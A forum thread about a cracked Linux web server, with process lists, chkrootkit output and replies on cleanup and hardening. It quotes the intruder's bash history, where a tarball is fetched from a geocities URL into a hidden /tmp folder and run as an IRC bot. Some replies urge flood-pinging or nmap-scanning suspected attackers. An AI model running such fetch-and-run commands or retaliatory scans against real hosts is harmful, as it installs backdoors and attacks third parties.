USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1372 480 ? S 10:02 0:04 init [5]
root 2 0.0 0.0 0 0 ? SW 10:02 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW 10:02 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN 10:02 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW 10:02 0:00 [kswapd]
root 6 0.0 0.0 0 0 ? SW 10:02 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW 10:02 0:00 [kupdated]
root 8 0.0 0.0 0 0 ? SW 10:02 0:00 [mdrecoveryd]
root 12 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 91 0.0 0.0 0 0 ? SW 10:02 0:00 [khubd]
root 186 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 187 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 188 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 189 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 190 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 533 0.0 0.1 1852 696 ? S 10:03 0:00 /usr/bin/ssh2d -q
root 550 0.0 0.1 1428 588 ? S 10:03 0:00 syslogd -m 0
root 555 0.0 0.1 1364 444 ? S 10:03 0:00 klogd -x
root 682 0.0 0.1 1452 572 ? S 10:03 0:00 /usr/sbin/fcron -b
root 700 0.0 0.3 2620 1236 ? S 10:03 0:00 /usr/sbin/sshd
root 720 0.0 0.2 2200 932 ? S 10:03 0:00 xinetd -stayalive -reuse -pidfile /var/
root 741 0.0 0.3 2428 1164 ? S 10:03 0:00 /bin/sh /usr/bin/safe_mysqld --defaults
mysql 784 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 798 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 799 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
root 800 0.0 0.4 4600 1816 ? S 10:03 0:00 sendmail: accepting connections
mysql 821 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
root 825 0.0 1.6 80028 6508 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 838 0.0 1.8 80220 7176 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 839 0.0 1.8 80324 7248 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 840 0.0 1.8 80348 7176 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 841 0.0 1.8 80240 7040 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 842 0.0 1.8 80200 7216 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 843 0.0 1.7 80204 6740 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 844 0.0 1.8 80232 7176 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 845 0.0 1.8 80240 7044 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
root 851 0.0 0.1 1548 620 ? S 10:03 0:00 crond
daemon 869 0.0 0.1 1404 524 ? S 10:03 0:00 /usr/sbin/atd
root 878 0.0 0.1 1344 400 tty2 S 10:03 0:00 /sbin/mingetty tty2
root 879 0.0 0.1 1344 400 tty3 S 10:03 0:00 /sbin/mingetty tty3
root 880 0.0 0.1 1344 400 tty4 S 10:03 0:00 /sbin/mingetty tty4
root 881 0.0 0.1 1344 400 tty5 S 10:03 0:00 /sbin/mingetty tty5
root 882 0.0 0.1 1344 400 tty6 S 10:03 0:00 /sbin/mingetty tty6
root 883 0.0 0.4 6156 1716 ? S 10:03 0:00 /usr/bin/gdm -nodaemon
apache 901 0.0 1.8 80348 7180 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
mysql 903 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
root 904 0.0 0.5 3680 2052 ? S 10:03 0:00 /usr/sbin/sshd
admin 905 0.0 0.3 2464 1300 pts/0 S 10:04 0:00 -bash
root 947 0.0 0.2 2332 1004 pts/0 S 10:04 0:00 su
root 948 0.0 0.3 2524 1356 pts/0 S 10:04 0:00 bash
mysql 1840 0.0 1.4 29196 5512 ? S 10:14 0:00 /usr/libexec/mysqld --defaults-file=/et
admin 1890 0.0 0.2 2520 928 ? S 10:32 0:00 /usr/libexec/openssh/sftp-server
apache 2199 0.0 1.8 80240 7048 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2200 0.0 1.8 80304 7248 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2201 0.0 1.7 80192 6736 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2202 0.0 1.7 80192 6740 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2203 0.0 1.8 80240 7044 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2204 0.0 1.8 80240 7048 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2205 0.0 1.8 80300 7252 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2207 0.0 1.8 80304 7244 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2208 0.0 1.8 80304 7248 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2209 0.0 1.8 80336 7176 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2210 0.0 1.8 80304 7228 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
mysql 2271 0.0 1.4 29196 5512 ? S 10:38 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 2290 0.0 1.4 29196 5512 ? S 10:43 0:00 /usr/libexec/mysqld --defaults-file=/et
root 2305 0.0 0.1 1344 400 tty1 S 10:43 0:00 /sbin/mingetty tty1
mysql 2321 0.0 1.4 29196 5512 ? S 10:46 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 2322 0.0 1.4 29196 5512 ? S 10:46 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 2450 0.0 1.4 29196 5512 ? S 11:14 0:00 /usr/libexec/mysqld --defaults-file=/et
root 2469 0.0 0.2 2748 788 pts/0 R 11:24 0:00 ps -aux
bash-2.05a#



netstat -taun

port 56789 is opened, how do I closed it and which task is running.

he deleted "ps" and I managed to copy ps back.

in /etc/passwd

there is a h4x0r user and /home/h4x0r directory

To find out the ports that are in listening state:
$ su
# netstat -ln
Finding out which programms are bound to open ports:
# netstat -lpn
tcp 0 0 0.0.0.0: 56789 0.0.0.0:* LISTEN PID/h4x0r_prog
Printing the full description:
# ps auwex | grep -w PID
# kill -HUP PID
than remove the script, whatever the h4x0r has left.

# killall pppd
# userdel h4x0r
# rm -rf /home/h4x0r
# /etc/rc.d httpd stop
# passwd (@#$dsf345sd#$%__!)

Analysis:
# less /var/log/apache/access_log
(I love this one):
cat /var/log/messages | awk '{print $4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14,$15}'|\
sed -e 's/\[[0-9]*\]:/:/' | sort | uniq | less

wall "get out of system" in crontab for every minute.

restart machine

deleted the /etc/passwd/h4x0r

I did not delete /home/h4x0r


netstat -taun

port 546789 still listening


add iptables running and change ssh port immediately

It may be beneficial to check your /var/log/ files to see if the dood didn't cover their tracks. Definately turn off all of your services for an indefinite amount of time - at least until you can determine what was compromised, and how if possible.

Unfortunately, the only way to be sure that your system is no longer compromised is to wipe and start fresh. Using utilities like nmap and nessus, you can find open ports on your home box as well as assess their security risks. In general, if a port is open an you are not using it, there is no need to keep it open.

Sorry to hear about your misfortune, and keep us posted on your findings!

- atf

I hope this is a lesson to everyone. Use firewalls/routers, keep you software up to date, and make sure you aren't running services that don't need to be on. Just because you guys are using Linux, that doesn't mean your system is impossible to crack.

If I were you 802.11, I would backup my system and reinstall.

0. email from chkrootkit contained 3 lines while I read that email from home

0.1 backup data to cd-rom on daily and inform boss.


1.changed root password


2. found netstat -lpn

3. /usr/bin/ssh2d


3. vi /usr/bin/ssh2d

^?ELF^A^A^A^@Linux^@^@^@^B^@^C^@^A^@^@^@^^^Q@^@4^@ ^@^@^@^@^@^@^@^@^@^@4^@ ^@^B^@^@^@^@^@^@^@^A^@^@^@^@^@^@^@^@^P@^@^@^P@^@E{ ^A^@^@~@^A^@^E^@^@^@^@^P^@^@^A^@^@^@ì^M^@^@ì^]^H^Hì^]^H^H^@^@^@^@^@^@^@^@^F^@^@^@^@^P^@^@EÄk\^?UPX~S^F^ K^L
^@$Info: This file is packed with the UPX executable packer http://upx.tsx.org $
^@$Id: UPX 1.11 Copyright (C) 1996-2000 the UPX Team. All Rights Reserved. $

http://upx.tsx.org/

---a----- ssh2d


lsattr.

still can't ssh2d

N00b here: Why wouldn't the first step be to take the machine under attack off the network, and then secure it? Or is it, and it's just so obvious that it wan't mentioned?

This won't really stop him or anything, but play with him and change his home directory on your system to "/dev/null". If you don't know what that is, it is essentially nothing, things sent there seem to vanish.... of course he could always just make a new user again, but this might slow him down, too.

(yes, I did get that idea from BOFH)

I want to delete ssh2d first. can u help?

"I want to delete ssh2d first. can u help?"
Well why didn't you say that originally instead of that other gibberish! :)

chattr -a ssh2d
rm -f ssh2d

The only way to ensure a clean system is a clean install. He/she had root access, and rootkits are fairly easy to get your hands on, if you can find a copy of chrootkit (a scanner) you may be able to detect compromised system files, if any.

Programs like tripwire monitor critical files and can report when the files have been modified. It would be a good idea to back-up the files tripewire monitors for a more easily recoverable system.

Since you'll likely be doing a new install, it may not hurt to add a few more layers of security..

Sendmail seems to have a notorious record for security, if you can replace it with something else, do so.
SSH can be easily configured for another port, most client ftp programs allow this also.
If you haven't done so all ready, change your firewall rules to drop, it dramaticly increases the time it takes to port scan a computer.

Whois usually includes an xxx@abuse with the information given.
Maybe take a look at your logs also, and see if your system was used to compromise another system or commit (as of yet) an unknown crime.

Originally posted by Spell
If you haven't done so all ready, change your firewall rules to drop, it dramaticly increases the time it takes to port scan a computer.Hey, nice tip. I think I'll do that myself. :)

To 802.11, the guy that cracked your system most likely knows something about Linux, otherwise he wouldn't have known to delete 'ps'. But, he obviously doesn't know what he's doing very well or is careless, because a Real cracker would have installed a fake 'ps' to mask what he was doing.

If a Real cracker broke into yoursystem, you probably wouldn't know it for weeks or months...

In this cases.. best thing you could do is backup everything you may need and re-install your system...

Luck!

The fact that he created a h4x0r home dir, it's obvious he's showing off. Most likely, this isnt just some random malicous attack on some website server. What chat rooms/message boards have you been hanging around recently 802.11??

Have you been challanging anyone to crack your system or bragging it cant be compromised?

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not infected
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... INFECTED
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not infected
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... not infected
Checking `named'... not infected
Checking `passwd'... /usr/bin/strings: passwd: No such file or directory
not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not found
Checking `rpcinfo'... not infected
Checking `rlogind'... not infected
Checking `rshd'... not infected
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not infected
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... /etc/ld.so.hash
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation) rootkit installed
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... Possible Ambient's rootkit (ark) installed
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/site_perl/5.6.0/i386-linux/auto/NKF/.packlist /usr/lib/perl5/5.6.1/i386-linux/.packlist

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ****C Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit ... nothing found
Searching for Romanian rootkit ... /usr/include/file.h /usr/include/proc.h
Searching for HKRK rootkit ... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
02:05:02 Job /home/myself/chkrootkit-0.40/chkrootkit terminated (exit status: 2) (mailing output)

what program is that , that check all those files?

don`t forget to check /etc/hosts.allow and /etc/hosts.deny

Originally posted by vivid
what program is that , that check all those files?

chkrootkit (http://www.chkrootkit.org/)

if possible, rebuild your system on another hard drive and save the hacked one. it would be interesting to investigate the steps leading up to the security breach.

most likely (assuming the attacker didn't know a password beforehand, or something equally obvious) the exploit involved apache or sendmail, (possibly mysql, but not as likely). older versions of apache are prone to chunked data exploits (buffer overflows, i think), but sendmail may be a more likely candidate since it is running as root on your system (thus giving the attacker root access after exploiting the daemon).

check your mail and web server logs in /var/log for suspicious activity, such as repeated POST methods to apache where there really shouldn't be, or other strange looking entries. same with sendmail. make a list of the ip addresses associated with these dubious entries and, starting in the log directory, run a "grep -iRH 'ip address' *" for each ip to find other entries in other logs. it may be possible to reverse-construct the breach, if the log files haven't been altered. my guess would be that they haven't. anybody stupid enough to make a home directory called h4x0r wants people to know he's/she's been there.

so, first step is to remove your machine from the network completely...always.

next, try to figure out how the breach occurred, so when you rebuild your system you can prevent it from happening again. for example, if you determine apache is the offending app, figure out why and fix it on your "new" installation (by upgrading apache, securing its configuration, etc.).

last, perform a deeper analysis of the attack. try to find the ip(s) of the attacker, use a traceroute to find out where it originated, and go from there. like i said...this guy's either not too smart or just doesn't care.

the dangerous attacks are the ones you don't discover.

This is the best thread I have read here in quite some time. Matter of fact....I'm going to read it again.

Ok. Now that I have read the thread again (I was skimming through it like a freaking Tom Clancy Novel man...couldn't read it fast enough) I have a couple of questions about this interesting incident.

1. It is obvious the attacker used a root kit due to the infected ifconfig file that was found during the scan and the fact that it was later terminated (the root kit). My question is, how did the attacker get the root kit on the machine to begin with? Remote buffer overflow exploit that dumped a shell? But if he already dumped a shell (assuming it is a root shell) why bother with a root kit? Secondary measure for future visits? Although I really should soak this gem of a thread up again, it seemed as though ssh was in use...but it seems unlikely he managed to grab a shell this way.

2. I am curious of the whois output. If this person was behind a proxy or series of proxies, would whois not show the proxy DNS info? If so, that would seem useless.

3. And as pointed out by a previous poster, it is most interesting that the attacker did not even try to hide the fact he was on the machine (wall...get off the system...haxor...etc). It will be interesting to hear of future efforts because it seems quite likely.


But most of all, good luck to 802.11. Of course like most people, I immediately imagine myself in this same position and that would not be fun. But at least you did notice and perhaps put a stop to it. As mentioned previously, I would certainly do a fresh install. What distro was this btw?

at my first post i didn't notice the ssh2d daemon running as root, also. there are some major vulnerabilities with older openssh versions, also, so this is another possible entry method. the rootkit, as bandwidth_pig mentioned, would likely have been installed to ensure future access if the attacker's first method was detected. a backup plan.

it is likely that the attacker IS behind some sort of proxy. however, they may simply be attacking from another system that is already compromised (have any of you ever ran snort from a pc with a cable modem connection? there are countless subscribers whose machines have been compromised and are now used as launching points for new attacks, and they haven't a clue). at the very least, you can see the last hop in the chain, and be a good samaritan and alert somebody else to a breach on their system. were everybody to cooperate in the chain of connections, the origin point could probably be located. but this will not happen.

recommendations: once you have rebuilt your system, install snort and tripwire, and monitor their findings daily.

An oldy but still a goody.

http://www.justlinux.com/forum/showthread.php?s=&threadid=75794&highlight=secure

I switched back to firestarter because you can see the hits as they happen. Guraddog didn't seem to work right with Redhat 8.0. Settings weren't persistent, but it may have been updated many times since I tried it.

If you find someone atacking your system,
ping -f <Their IP>
is usually enough to let them know you are on to them. Several times I have been port scanned (not nicely, like 30-50 hits in sendmail/second for 10 minutes kind of thing)
and this caused them to shut up pretty quickly. I usually report them to their ISP and in one case, they told me that they had deleted the person's account.

hlrguy

Take and follow some of what the following suggests for you distro and you should be in pretty good shape:

http://jetblackz.freeservers.com/

Have you been challanging anyone to crack your system or bragging it cant be compromised?

no. definitely not.

last night the system is ok.

(5:30- 6:30) is still ok.
I was unable to remove ssh2d.
I ran the chkrootkit and

after 9:00, I discoved the

Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation) rootkit installed

Searching for Ambient's rootkit (ark) default files and dirs... Possible Ambient's rootkit (ark) installed.


this is the unusal.

If there is a third HD, I will re-install everything with the third HD.

I could only re-install the "second HD" it can't boot up.

the feedback

a. ps -ef

apache links to geocities.com

b. netstat -taun

0.0.0.0:6 listen to 7
( I could not remember to the whole thing").

Originally posted by AnandT
It's really cool that you actually got attacked by a hacker, I thought this stuff never happens!

.....
..........

*ahem.....sorry.
Someone wants to nmap the world.

Happens all the time if you host web sites. Its happened to me before, not fun.

This the work of a cracker not a hacker ok.

do u mean inside job from staff?

Originally posted by hlrguy
If you find someone atacking your system,
ping -f <Their IP>
is usually enough to let them know you are on to them. Several times I have been port scanned (not nicely, like 30-50 hits in sendmail/second for 10 minutes kind of thing)
and this caused them to shut up pretty quickly. I usually report them to their ISP and in one case, they told me that they had deleted the person's account.


I've recently stumbled across root-tail ( root-tail.plan9.de ) while fooling around with using Eterm to tail various log windows, and so far it has seemed to work exceptionally well so far. The program writes directly to the root window, rather than to a stripped terminal window. You can set it up to tail multiple logs and can color code the various error messages as they are posted real time to your logs.

I bring it up, just because of my increasing interest in network security, and that in the few hours that it has been up, I've been aware of at least 3 separate probes to my various services. Apache gets bombed the most, but rapidly scrolling text on your root window (which means it "sticks" between desktops) can be a pretty big tip off something is happening. I 'returned fire' with a quick nmap of their IP, and conveniently the would-be attacker ceased their respective scans.

Which brings me to another question...under metalog, /var/log/everything/current is supposed to catch every message sent through the logger, but this doesn't seem to catch messages posted to my login terminal. How do I capture this to a log so that I can keep an eye on my X sessions and apps (eg - to know when my mail reader disconnects from the server, and so on)?

- atf

Originally posted by elite_syntax
This the work of a cracker not a hacker ok. Originally posted by 802.11
do u mean inside job from staff?No, he means that cracker stands for 'criminal-hacker'. Real hackers don't break into other peoples computers, they're just lovable nerds that like to spend hours perfecting software code. (Personally, I can't stand hacking. I just like to create the code and be done with it. :p)

In this thread, you can almost tell which people are more experienced with Linux just by reading whether they called this guy a 'cracker' or 'hacker'. It's not very good entertainment, though. ;)

Read more about it here.
http://www.cbc.ca/news/indepth/words/hack.html

before the system went down yesterday, I have discoved that "the staff-K" has installed a software from gecities.com

this is from /root/.bash_history

q1. what is that site ?
q2. why he upgraded files in /etc/ ?
he once became mandrke is better than rh.




> http://www.geocities.com/XXXenx/termmtermm.txt

>
> kei download
>
> ls hda*
> ls hdc*
> mount /dev/hdc1 /mnt/cdrom
> dmesg | more
> cd /
> mount /dev/hdc /mnt/cdrom
> cd /mnt/cdrom
> ls
> cd rpms
> ls
> man rpm
> ls
> rpm -Uvh *.rpm
> cd /etc
> tar -cvzf /root/etc.tgz *
> cd /var
> tar -cvzf /root/var.tgz *
> unmount /dev/hdc
> umount /mnt/cdrom
> mount
> cd ~
> ls
> cp *.tgz /home/kei
> cd /home/kei
>
> cd /tmp
> mkdir .stfu
> cd .stfu
> chmod 744 /usr/bin/ftp
> chmod 744 /usr/bin/wget
> wget www.geocities.com/XXXenx/kuyangora.tar.gz <----
> tar zxvf kuyangora.tar.gz
> rm -rf kuyangora.tar.gz
> cd kuya
> ./psybnc
> cd /tmp/.stfu
> w
> ls
> cd kuya
> ./psybnc
> cat psybnc.conf

thats a funny bash_history log :)

kuyangora.tar.gz-
Looks like an IRC bot, the home page for the actual program is here. http://www.psychoid.lam3rz.de/ (checksum doesn't match, of course). The real program is for keeping an irc chat room open. The modified program could be used for sending your online status, DOS attacks, etc. If your unsure of a file, you can gain more information from the prompt with $file <filename> and $strings <filename> (latter is good for looking at executables without running the program). Unfortunately, I'm stuck with the programmers' comments for now.

Your network/system (iptables config, eth# config files) configuration files are in /etc/ (there maybe 31337 port listing which happens to be in your psybnc.conf). Files are often replaced to hide the attacker actions ie. a modified netstat to hide a listening port. There's a nice perl replacement script for netstat that can be found at http://cv.intellos.net it's called conntrack (also shows connections for masq, which is unsupported with netstat -M in rh8 and up).

The site is probably a place where the guy/girl keeps his files for upload.

You are lucky. The guy that got into your computer is a completely idiot...

he has an account but he can have phyiscal access to the machine too.

Originally posted by 802.11
he has an account but he can have phyiscal access to the machine too.
Then you know the person? :confused:

udp 0 0 20X.194.206.yy:33380 209.81.71.60:53 ESTABLISHED


tcp 0 0 127.0.0.1:32823 127.0.0.1:25 ESTABLISHED
tcp 0 0 127.0.0.1:25 127.0.0.1:32823 ESTABLISHED
udp 0 0 20x.194.206.yy:33380 209.81.71.60:53 ESTABLISHED

tcp 0 0 127.0.0.1:32823 127.0.0.1:25 ESTABLISHED
tcp 0 0 127.0.0.1:25 127.0.0.1:32823 ESTABLISHED

Looks like your computer sending out a email..


udp 0 0 20X.194.206.yy:33380 209.81.71.60:53 ESTABLISHED

This just looks like someone doing a dns lookup.

yes, I am but the email does get through go north african ( brazil)


I am getting a bit "jumpy" now.

The original message was received at Sat, 28 Jun 2003 11:16:40 +0800
from localhost.localdomain [127.0.0.1].

my sendmail 's mailertable has no entry at all. can u help>?

Sorry, can't understand - could you be a bit more specific perhaps?

This is probably one of the biggest reasons that I'm getting a new box so that I can set it up as a firewall with snort, squid, tripwire, chkrootkit, etc. running on it. I'm not overly paranoid, but I'd like to know if someone cracks my system & these programs have helped me to thhis point as a couple of them are run from cron almost evry hour. This also helps me to pinpoint an attack & then take any necessary precautions.
I've had my box cracked once & my daily & weekly backups helped restore my system to the way it was before. But before I got back online I ran several programs, such as nessus & nmap, & have researched a whole new plan before I get my dedicated security box.
Hope this helps me be better prepared for the next attempt on my system ;)

Not to be an a** but if you have no Idea what is going on with your system, it may be time to reinstall, and rethink you systems security before you offer services that you dont know how to control.

EDIT:

Since when is Brazil in North Africa?

It sounds like your sendmail is probably an open relay. Consider implementing some basic security.

See, this is why I don't believe a default Linux distro is any more secure than default WinXP.

Originally posted by chort
See, this is why I don't believe a default Linux distro is any more secure than default WinXP.

a bit of a generalization. depends on the distro.

some don't have any MTA by default, unless you install it yourself.

802.11: your problem is a very interesting one, and i'm sure everyone here is glad to help in any way that they can. however, your messages are a bit cryptic. what i mean is, it is very hard to understand what you are trying to say at times from your grammar. if you could be a little more clear in your posts it would be helpful.

In future it might be a good idea to portscan for common trojan ports when you suspect you're under attack from a host - this might give an indication as to whether the host is an unwitting proxy or the attacker's machine.

Just a thought. :)

zynaps

the co-workers has pyhsical access and he builds his own account.

I alway monitor with "netstat -taun"


what is need to install to do portscanning??

Originally posted by 802.11
the co-workers has pyhsical access and he builds his own account.

I alway monitor with "netstat -taun"


what is need to install to do portscanning??

nmap, the best portscan tool :D

www.insecure.org

...but the way that this nerd got into your machine wouldn't in the remotest chance be connected to your nickname???
Airsnort for your root password.....

what is airsnort root password means ?


can u show to how to use "simple " snort ?

airsnort (http://www.google.com/linux?hl=en&lr=lang_en&ie=ISO-8859-1&q=airsnort&btnG=Google+Search)